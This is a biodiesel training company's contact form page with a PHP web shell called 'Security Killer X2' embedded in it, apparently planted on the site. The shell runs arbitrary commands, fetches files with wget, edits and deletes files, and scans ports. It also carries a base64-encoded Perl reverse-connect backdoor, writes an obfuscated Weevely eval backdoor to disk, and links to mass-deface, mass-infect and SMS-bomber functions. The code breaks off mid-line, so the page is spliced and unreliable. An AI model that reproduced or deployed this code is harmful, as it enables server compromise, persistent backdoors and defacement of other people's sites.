Biodieset
Inhouse Training Form
 
<html>
<LINK rel="SHORTCUT ICON" href="http://upload.wikimedia.org/wikipedia/commons/thumb/9/90/National_emblem_of_Indonesia_Garuda_Pancasila.svg/85px-National_emblem_of_Indonesia_Garuda_Pancasila.svg.png">
<body>
<?php


 $head = '
<html>
<head>
</script>
<title>Security Killer ++</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
body {
    background-image: url(http://indocyberattacker.org/background.gif);
    background-repeat: repeat-x repeat-y;
    background-position: left top;
    font-size: 14px;
    background-attachment: fixed;
font-family: sans;
color: red;
margin:0px 0px 0px 0px;
}
font-family: Courier New
}
tr {
BORDER: line 1px #333;
color: #FFF;
}
td {
BORDER: line 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: line 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border            : line 1px;
border-color        : #333;
BACKGROUND-COLOR: #111111;
font: 9pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: #111111;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: #111111;
width: 30%;
color: #FFF;
}
textarea {
border            : line 1px #333;
BACKGROUND-COLOR: #111111;
font: Fixedsys bold;
color: #999;
}
BODY {
    SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: #111111;
}
.main {
margin            : -287px 0px 0px -490px;
BORDER: line 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: transparent;
}

A:link {
    COLOR: White; TEXT-DECORATION: none
}
A:visited {
    COLOR: White; TEXT-DECORATION: none
}
A:hover {
    color: Red; TEXT-DECORATION: none
}
A:active {
    color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language='javascript'>
function hide_div(id)
{
  document.getElementById(id).style.display = 'none'
  document.cookie=id+'=0;'
}
function show_div(id)
{
  document.getElementById(id).style.display = 'block'
  document.cookie=id+'=1;'
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == 'none')
    show_div(id);
  else
    hide_div(id);
}
</script>' ?>
<?php
error_reporting(0);
#chdir('');
//Some basic var's
if (!@$_GET['path']) {
    $dir = CleanDir(getcwd());
} else {
    $dir = CleanDir($_GET['path']);
}
$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
$domain = $_SERVER['HTTP_HOST'];
$script = $_SERVER['SCRIPT_NAME'];
$full_url = $_SERVER['REQUEST_URI'];
$script2 = basename($script);
$serverip = $_SERVER['SERVER_ADDR'];
$userip = $_SERVER['REMOTE_ADDR'];
$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
$disabled = ini_get('disable_functions');
//Perl back connect script by LorD
//Encoded in base64 for convenience
$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
@ini_set("memory_limit", "9999M");
@ini_set("max_execution_time", "0");
@ini_set("upload_max_filesize", "9999m");
@ini_set("magic_quotes_gpc", "0");
@set_magic_quotes_runtime(0);
set_time_limit(0);
if (empty($disabled)) {
    $disabled = "None";
}
//Some functions
function CleanDir($directory) {
    $directory = str_replace("\", "/", $directory);
    $directory = str_replace("//", "/", $directory);
    return $directory;
}
function success($for, $var1) {
    $domain = $_SERVER['HTTP_HOST'];
    $script = $_SERVER['SCRIPT_NAME'];
    $full_url = $_SERVER['REQUEST_URI'];
    if ($for == "filesave") {
        $message = "File Saved!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "filedelete") {
        $message = "File Deleted!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "createdir") {
        $message = "Directory Created!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "dir_exists") {
        $message = "Directory Already Exists!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "file_exists") {
        $message = "File Already Exists!";
        $redirect = "http://$domain$script?editfile=$var1";
    }
    if ($for == "file_created") {
        $message = "File Created!";
        $redirect = "http://$domain$script?editfile=$var1";
    }
    if ($for == "file_uploaded") {
        $message = "File Uploaded!";
        $redirect = "http://$domain$full_url";
    }
    if ($for == "shell_killed") {
        $message = "Shell Killed!";
        $redirect = "http://$domain$script";
    }
    if ($for == "dir_del") {
        $message = "Directory Deleted!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "dir_renamed") {
        $message = "Directory Renamed!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "file_renamed") {
        $message = "File Renamed!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "configs_found") {
        $message = "$var1 Configs Found!";
        $redirect = "";
    }
    if ($for == "unzip") {
        $message = "Successfully Unzipped File!";
        $redirect = "http://$domain$script?path=$var1";
    }
    if ($for == "files_found") {
        $message = "$var1 files found!";
        $redirect = "";
    }
    if ($for == "weevely") {
        $message = "Weevely BackDoor Installed!";
        $redirect = "";
    }
    echo "<div id='xbox'><embed
   src='http://p0wersurge.com/js/achievementnopic.swf'
   width='300'
   height='80'
   flashvars='Text=$message&gs=1337'
   wmode='transparent'/></div>";
    if (empty($redirect)) {
        echo "<script>
function remove (){
 document.getElementById('xbox').innerHTML=''
}
setInterval(function(){remove();}, 2700);
</script>";
    } else {
        echo "<script>
function remove (){
 window.location = '$redirect'
}
setInterval(function(){remove();}, 2500);
</script>";
    }
}
function error($mesg) {
    $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
    echo "$error";
}
function ByteConversion($bytes, $precision = 2) {
    $kilobyte = 1024;
    $megabyte = $kilobyte * 1024;
    $gigabyte = $megabyte * 1024;
    $terabyte = $gigabyte * 1024;
    if (($bytes >= 0) && ($bytes < $kilobyte)) {
        return $bytes . ' B'
    } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
        return round($bytes / $kilobyte, $precision) . ' KB'
    } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
        return round($bytes / $megabyte, $precision) . ' MB'
    } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
        return round($bytes / $gigabyte, $precision) . ' GB'
    } elseif ($bytes >= $terabyte) {
        return round($bytes / $terabyte, $precision) . ' TB'
    } else {
        return $bytes . ' B'
    }
}
//Mass File Function
function files($mass_dir) {
    if ($dh = opendir($mass_dir)) {
        $files = array();
        $inner_files = array();
        while ($file = readdir($dh)) {
            if ($file != "." && $file != ".." && $file[0] != '.') {
                if (is_dir($mass_dir . "/" . $file)) {
                    $inner_files = files("$mass_dir/$file");
                    if (is_array($inner_files)) $files = array_merge($files, $inner_files);
                } else {
                    array_push($files, "$mass_dir/$file");
                }
            }
        }
        closedir($dh);
        return $files;
    }
}
//Upload File
if (isset($_POST['do_upload_file'])) {
    $udir = $_POST['upload_location'];
    $uname = $_FILES['upload_file']['name'];
    $both = "$udir$uname";
    if (file_exists($both)) {
        success("file_exists", $both);
    } else {
        switch ($_FILES['upload_file']['error']) {
            case 0:
                if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
                    success("file_uploaded");
                } else {
                    error("Failed To Upload File!");
                }
        }
    }
}
//wget file
if (isset($_POST['do_wget_file'])) {
    $wget_file = $_POST['wget_file'];
    $wecmd = "wget $wget_file";
    $wget_ecmd = cmd2($wecmd, $dir);
    echo "<center><font color='#14ab00'>
Result:<br>
<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
$wget_ecmd
</textarea></font></center><br><br>";
}
//Execute command
function cmd2($cmd, $path) {
    chdir($path);
    $disabled = ini_get('disable_functions');
    if (empty($disabled)) {
        $disabled = "None";
    }
    if ($disabled == "None") {
        $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!feof($io[1])) {
            $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($execute);
        return $res;
    } elseif (function_exists("proc_open")) {
        $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!feof($io[1])) {
            $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($execute);
        return $res;
    } elseif (function_exists("exec")) {
        $res = exec($cmd);
        return $res;
    } elseif (function_exists("system")) {
        $res = system($cmd);
        return $res;
    } elseif (function_exists("shell_exec")) {
        $res = shell_exec($cmd);
        return $res;
    } elseif (function_exists("passthru")) {
        $res = passthru($cmd);
        return $res;
    } else {
        error("The necessary functions to execute commands are disabled!");
    }
}
//Unzip function
function unzip($filename, $directory) {
    $zip = new ZipArchive;
    $res = $zip->open($filename);
    if ($res === TRUE) {
        $zip->extractTo($directory);
        $zip->close();
        success("unzip", $directory);
    } else {
        cmd2("unzip $filename", $directory);
    }
}
//Get files and directories and throw them into an array.
$open = opendir($dir);
$files = array();
$direcs = array();
while ($file = readdir($open)) {
    if ($file != "." && $file != "..") {
        if (is_dir("$dir/$file")) {
            array_push($direcs, $file);
        } else {
            array_push($files, $file);
        }
    }
}
asort($direcs);
asort($files);
?>
<html>
<head>
<?php
        echo $head ;
        echo '

<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >

            


       <td width="100%" align=center valign="top" rowspan="1">
           <font color=red size=8 face="Wallpoet"><b>Security</font><font color=white size=8 face="Wallpoet"><b>  Killer</font><font color=green size=8 face="Wallpoet"><b> X2 </font> <div class="hedr">

        <td height="10" align="left" class="td1"></td></tr><tr><td
        width="100%" align="center" valign="top" rowspan="1"><font
        color="red" face="comic sans ms"size="3"><b>
        <font color=red>
        
        
        
        [+] We kill your security [+]
                        
           </table>
           
        

'

?>
<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>Second Generation of Security Killer Shell</font><br></td></tr></table>
</head>
<p></p>
<p></p>
<body bgcolor="black"><body bgcolor="black">
<table border=1 width=100%><td width=15% align=right><font color=red size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname()  ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none' echo $r;?>
</table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
</table>
<center><div id="menu">
<a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=white> [Home] </font></a>
<a href="<?php echo '?perlbackconnect'?>"><font size=4 face="Wallpoet" color=red> [Perl Back Connect] </font></a>
<a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=white> [Python Back connect] </font></a>
<a href="<?php echo '?encrypt'?>"><font size=4 face="Wallpoet" color=red> [Encrypt] </font></a>
<a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=white> [Mass Deface] </font></a>
<a href="<?php echo '?massinfect'?>"><font size=4 face="Wallpoet" color=red> [Mass File Infect] </font></a>
<a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=white> [Install MSD] </font></a>
<p></p>
<a href="<?php echo '?sms'?>"><font size=4 face="Wallpoet" color=red> [SMS Bomber] </font></a>
<a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=white> [Reverse IP] </font></a>
<a href="<?php echo '?weev'?>"><font size=4 face="Wallpoet" color=red> [Weevely Backdoor] </font></a>
<a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=white> [Port Scan] </font></a>
</div></center>
<p></p>
<p></p>
<p></p>
<?php
if (isset($_GET['encrypt'])) {
    echo "<form action='' method='post'>
<center><font color='#14ab00'>
<input type='text' name='en_string' class='text'>
<input type='submit' name='do_encrypt' value='Encrypt String'>
</form>
</font></center>";
}
if (isset($_POST['do_encrypt'])) {
    $vbsalt = gen_salt("30");
    $vbsalt2 = gen_salt("3");
    $mybbsalt = gen_salt("8");
    $ipbsalt = gen_salt("5");
    $joomlasalt = gen_salt("32");
    $password = $_POST['en_string'];
    $md5 = md5($password);
    $md52 = md5(md5($password));
    $md53 = md5(md5(md5($password)));
    $sha1 = sha1($password);
    $sha256 = hash('sha256', $password);
    $vbalg = md5(md5($password) . $vbsalt);
    $vbalg2 = md5(md5($password) . $vbsalt2);
    $mybbalg = md5(md5($mybbsalt) . $password);
    $ipbalg = md5(md5($ipbsalt) . md5($password));
    $joomlaalg = md5($password . $joomlasalt);
    $en_result = "Hashes for string: $password MD5: $md5 md5(md5(pass)): $md52 md5(md5(md5(pass))): $md53 SHA-1: $sha1 SHA-256: $sha256 vBulletin 4: $vbalg:$vbsalt vBulletin 3: $vbalg2:$vbsalt2 MyBB: $mybbalg:$mybbsalt IPB: $ipbalg:$ipbsalt Joomla 1.0.13+: $joomlaalg:$joomlasalt ";
    echo "<center>
<textarea rows='20' cols='150' style='color:#00ff00'>
$en_result
</textarea>
</center><br>";
}
?>
<?php
//Port scan
if (isset($_GET['scan'])) {
    echo "<center><font color='#14ab00' size='3'>
Port Scan:<br>
<form action='' method='post'>
Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
Start port: <input type='text' name='start_port' class='text' size='6'>
End port: <input type='text' name='end_port' class='text' size='7'><br>
<input type='submit' name='start_scan' value='Scan'>
</form>
</font>
</center>";
}
if (isset($_POST['start_scan'])) {
    $scanhost = $_POST['scan_host'];
    $startport = $_POST['start_port'];
    $endport = $_POST['end_port'];
    while ($startport <= $endport) {
        if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
            echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
        } else {
            echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
        }
        $startport++;
    }
}
?>
<?php
//Edit file stuff
if (!empty($_GET['editfile'])) {
    $edfile = $_GET['editfile'];
    $redirectloc = dirname($edfile);
    echo "<form method='POST'><center>";
    if (file_exists($edfile)) {
        if (get_magic_quotes_gpc()) {
            $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
        } else {
            $file_content = htmlspecialchars(file_get_contents($edfile));
        }
        if (is_writeable($edfile)) {
            echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
<br><br>
        <input type='submit' name='savedit' value='Save' />
        <input type='submit' name='deletefile' value='Delete' />
        </form></center>";
            if (isset($_POST['savedit'])) {
                if (get_magic_quotes_gpc()) {
                    $edfilecontent = stripslashes($_POST['edfile_contents']);
                } else {
                    $edfilecontent = $_POST['edfile_contents'];
                }
                if (file_put_contents($edfile, $edfilecontent)) {
                    success("filesave", rtrim($redirectloc, "/"));
                } else {
                    error("Failed to save file!");
                }
            } else if (isset($_POST['deletefile'])) {
                if (unlink($edfile)) {
                    success("filedelete", rtrim($redirectloc, '/'));
                } else {
                    error("Failed to delete file!");
                }
            }
        } else {
            echo "<font color='red'><b>File is read only!</b></font><br>
<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
        }
        echo "</center>";
    } else {
        echo "<form method='POST'><center>";
        echo "<font color='red'><b>File does not exist!</b></font><br>
<textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
</textarea><br><br>
 <input type='submit' name='savefile' value='Create File' /><br /><br />
        </form></center>";
        if (isset($_POST['savefile'])) {
            if (get_magic_quotes_gpc()) {
                $newfilecontent = stripslashes($_POST['newfile_contents']);
            } else {
                $newfilecontent = $_POST['newfile_contents'];
            }
            if (file_put_contents($edfile, $newfilecontent)) {
                success("filesave", rtrim($redirectloc, "/"));
            } else {
                error("Failed to save file!");
            }
        }
    }
}
?>
<?php
//Weevely backdoor
if (isset($_GET['weev'])) {
    echo "<center><font color='#14ab00' size='3'>
<form action='' method='post'>
Directory to install weevely backdoor:<br>
<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
Name of file (something .php):<br>
<input type='text' name='weev_name' class='text' value='weevely.php'><br>
Password (more than 3 characters):<br>
<input type='text' name='weev_pass' class='text'><br>
<input type='submit' name='install_weev' value='BackDoor'><br>
</font>
</center>";
}
if (isset($_POST['install_weev'])) {
    $weevdir = rtrim($_POST['weev_dir'], '/');;
    $weevname = $_POST['weev_name'];
    $weevpassword = $_POST['weev_pass'];
    if (strlen($weevpassword) < 3) {
        error("Password must be longer than 3 characters!");
    } else {
        $first2 = $weevpassword[0] . $weevpassword[1];
        $rest = substr($weevpassword, 2);
        $money = "$";
        $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
        $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
        $weevelybd3 = "$money" . "k='$rest'";
        $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
        $all = "<?php eval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "')); ?>";
        if (file_put_contents($weevdir . '/' . $weevname, $all)) {
            echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
            success("weevely");
        } else {
            error("Failed to write backdoor to $weevdir");
        }
    }
}
?>
<?php
//Domain information
//Get domains hosted on server from yougetsignal.com
if (isset($_GET['domaininfo'])) {
    echo "<font color='#14ab00' size='3'>";
    $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
    $num = 0;
    $count = sizeof($dns_record);
    echo "<br></b><br>";
    while ($num < $count) {
        $name_servers = $dns_record[$num];
        $name_servers2 = $name_servers['type'];
        $name_servers3 = @$name_servers['target'];
        $num++;
        if ($name_servers2 == "NS") {
            echo "$name_servers3<br>";
            $nshost = @$name_servers['host'];
        }
        if ($name_servers2 == "SOA") {
            $nsemail = $name_servers['rname'];
        }
        if ($name_servers2 == "A") {
            $nsip = $name_servers['ip'];
        }
    }
    $num = 0;
    echo "<br><table class='noborder'>
</table><br>";
    $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
    $status = $domains_on_server->status;
    $message = $domains_on_server->message;
    $domainAr = $domains_on_server->domainArray;
    $num_of_site = $domains_on_server->domainCount;
    $count = sizeof($domainAr);
    if ($status == "Success") {
        echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
        while ($num < $count) {
            $hossites = $domainAr[$num];
            $num++;
            $hossites3 = $domainAr[$num];
            $hossites3 = $hossites3[0];
            $hossites = $hossites[0];
            $site_ips = empty($hossites) ? "" : "(&
First Name: *
Last Name: *
Company
Business E-mail: *
Phone: *
Questions / further details:
 
Upcoming
Training Courses:
Biodieset
 
Contact Details
Home|Latest Training Courses|In House Training|Group Training|Distance Learning Course|Become A Trainer|Contact us

Campus Biodiesel |Training Tools

Copyright © CJP 2016